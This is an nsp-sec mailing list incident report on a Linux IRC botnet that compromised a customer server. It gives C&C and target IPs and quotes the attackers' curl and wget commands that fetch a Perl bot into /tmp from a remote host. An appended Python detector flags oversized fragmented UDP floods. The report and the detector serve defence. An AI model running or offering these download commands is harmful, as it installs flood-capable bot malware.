[nsp-sec] Linux botnet AS14061, 8218, 23118 (C&C), 6739 (target)

Mike Tancsa mike at sentex.net
Wed Apr 12 15:49:08 EDT 2017


The zip gets flagged by a few AV scanners as
perl.ircbot.Arabhac.59.UNOFFICIAL

If it got blocked, let me know and I can send it OOB

	---Mike

On 4/12/2017 3:36 PM, Mike Tancsa wrote:
> ----------- nsp-security Confidential --------
> 
> I had a customer's server hacked from 193.225.104.133 back on March 16th
> via an old test-cgi exploit.  From there, the attackers download a shell
> script called pop
> 
> which downloaded some perl scripts
> 
> curl -o /tmp/oka http://162.243.110.85/.xa/oka
> wget http://162.243.110.85/.xa/oka -O /tmp/oka
> 
> which connects to what appears to be an IRC server at 69.77.154.110.
> I am guessing via IRC, it was told to download another bot program
> from 193.227.248.244 that reaches out to the same host for attack
> information.
> 
> http://193.227.248.244/intranet/mdb
> 
> mdb is a perl program that does tcp/udp floods on demand getting
> commands from 69.77.154.110.
> 
> Today's targets were a series of IP addrs in Spain. UDP packets 35,000
> bytes in size (lots of fragmentation) directed at
> 213.37.244.4
> 213.37.244.5
> 213.37.244.6
> 213.37.244.7
> 37.158.239.230
> 
> The attack today was April 12 14:23 UTC from the customer's IP
> 64.7.142.141. The customer box is cleaned up for now, so please do not
> block.
> 
> The scripts are attached in the zip file. You can pass on the scripts
> as you see fit as well as the C&C info.
> 
> Note, the C&C has a bit of a delay on the initial connection. So an
> impatient scanner will miss it. The first time it sees your tcp SYN, it
> will not respond with a SYN ACK for 20 seconds. It seems to cache things
> after that and allow connections normally...
> the C&C IP (69.77.154.110) was hard coded into the perl script I found.
> 
> Thanks!
> 
> 
> 	---Mike
> 


-- 
-------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike at sentex.net
Providing Internet services since 1994 www.sentex.net
Cambridge, Ontario Canada   http://www.tancsa.com/
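The report above describes the flood as 35,000-byte UDP datagrams, which means every one of them leaves the compromised host as a train of MTU-sized IP fragments. From the network side that is a usable signature: an operator watching flows from a customer range can recover the original datagram size from the last fragment (offset times 8 plus that fragment's own payload) and flag a source that pushes such datagrams at several hosts at a high rate. The following is an added example written for this thread, not code from the nsp-security list or from the bot scripts. Its record format is a constructed minimal one (timestamp, src, dst, protocol number, IP ID, total length, fragment offset in 8-byte units, MF flag), the fields any capture or IDS can export; the addresses are the ones named in the report, while the timings, counts and thresholds are made up.

```python
"""Flag hosts taking part in an oversized-UDP flood from packet-level records.

Added example for the incident described in the thread; not the list's or the
bot's code. Record format, sample traffic and thresholds are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

IPV4_HEADER = 20                    # header without options (assumption)
FRAG_PAYLOAD = 1500 - IPV4_HEADER   # 1480 bytes per Ethernet-MTU fragment, a multiple of 8


@dataclass(frozen=True)
class Pkt:
    ts: datetime
    src: str
    dst: str
    proto: int
    ip_id: int
    ip_len: int       # IPv4 total length: header + payload
    frag_off: int     # fragment offset in 8-byte units
    more_frags: bool  # MF flag


def parse_record(line: str) -> Pkt:
    """Parse one constructed record: 'ts src dst proto ip_id ip_len frag_off mf'."""
    ts, src, dst, proto, ip_id, ip_len, off, mf = line.split()
    return Pkt(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), src, dst,
               int(proto), int(ip_id), int(ip_len), int(off), mf == "1")


def datagram_sizes(pkts):
    """Recover each datagram's IP payload size from its last fragment (MF clear):
    offset * 8 plus that fragment's own payload. An unfragmented packet is its
    own last fragment, so it is covered too. Keyed by (src, dst, ip_id)."""
    sizes = {}
    for p in pkts:
        if not p.more_frags:
            sizes[(p.src, p.dst, p.ip_id)] = p.frag_off * 8 + (p.ip_len - IPV4_HEADER)
    return sizes


def udp_flood_sources(pkts, min_datagram=8000, min_targets=3, min_pps=200):
    """Return {src: {"targets": [...], "max_datagram": int, "pps": float}} for hosts
    sending UDP datagrams of at least min_datagram bytes to at least min_targets
    distinct hosts at a sustained rate of at least min_pps IP packets per second.
    The thresholds are illustrative and must be tuned to the link being watched."""
    udp = [p for p in pkts if p.proto == 17]
    stats = defaultdict(lambda: {"targets": set(), "max_datagram": 0,
                                 "packets": 0, "first": None, "last": None})
    for p in udp:
        s = stats[p.src]
        s["packets"] += 1
        s["first"] = p.ts if s["first"] is None else min(s["first"], p.ts)
        s["last"] = p.ts if s["last"] is None else max(s["last"], p.ts)
    for (src, dst, _), size in datagram_sizes(udp).items():
        if size >= min_datagram:
            stats[src]["targets"].add(dst)
            stats[src]["max_datagram"] = max(stats[src]["max_datagram"], size)
    flagged = {}
    for src, s in stats.items():
        span = max((s["last"] - s["first"]).total_seconds(), 1.0)  # a one-second burst still divides cleanly
        pps = s["packets"] / span
        if len(s["targets"]) >= min_targets and pps >= min_pps:
            flagged[src] = {"targets": sorted(s["targets"]),
                            "max_datagram": s["max_datagram"], "pps": pps}
    return flagged


def fragment_records(ts, src, dst, ip_id, payload_len, proto=17):
    """Build the constructed records for one datagram fragmented at Ethernet MTU."""
    lines, off = [], 0
    while off < payload_len:
        chunk = min(FRAG_PAYLOAD, payload_len - off)
        mf = 1 if off + chunk < payload_len else 0
        lines.append(f"{ts} {src} {dst} {proto} {ip_id} {IPV4_HEADER + chunk} {off // 8} {mf}")
        off += chunk
    return lines


# Constructed sample: the compromised host floods the five reported targets with
# 35,000-byte UDP datagrams over two seconds; a second host moves one large
# fragmented datagram to a single peer; a third sends ordinary unfragmented UDP.
# Only the first source should be flagged.
TARGETS = ["213.37.244.4", "213.37.244.5", "213.37.244.6", "213.37.244.7", "37.158.239.230"]
SAMPLE = []
_ip_id = 1000
for _second in (0, 1):
    for _dst in TARGETS:
        for _ in range(5):
            _ip_id += 1
            SAMPLE += fragment_records(f"2017-04-12T14:23:0{_second}", "64.7.142.141", _dst, _ip_id, 35000)
SAMPLE += fragment_records("2017-04-12T14:23:00", "10.0.0.5", "10.0.0.9", 7, 35000)
SAMPLE.append("2017-04-12T14:23:00 10.0.0.6 10.0.0.53 17 8 512 0 0")


def analyze(lines=SAMPLE):
    return udp_flood_sources(parse_record(l) for l in lines)


if __name__ == "__main__":
    for src, info in analyze().items():
        print(f"{src}: {len(info['targets'])} targets, max datagram "
              f"{info['max_datagram']} B, {info['pps']:.0f} pps")
```

Keying the reassembly on (src, dst, ip_id) is enough for a detector, since only the last fragment is consulted; a real reassembler would also have to handle reordering and expire incomplete groups. Non-first fragments carry no UDP header, which is why the logic keys on protocol 17 at the IP layer rather than on ports.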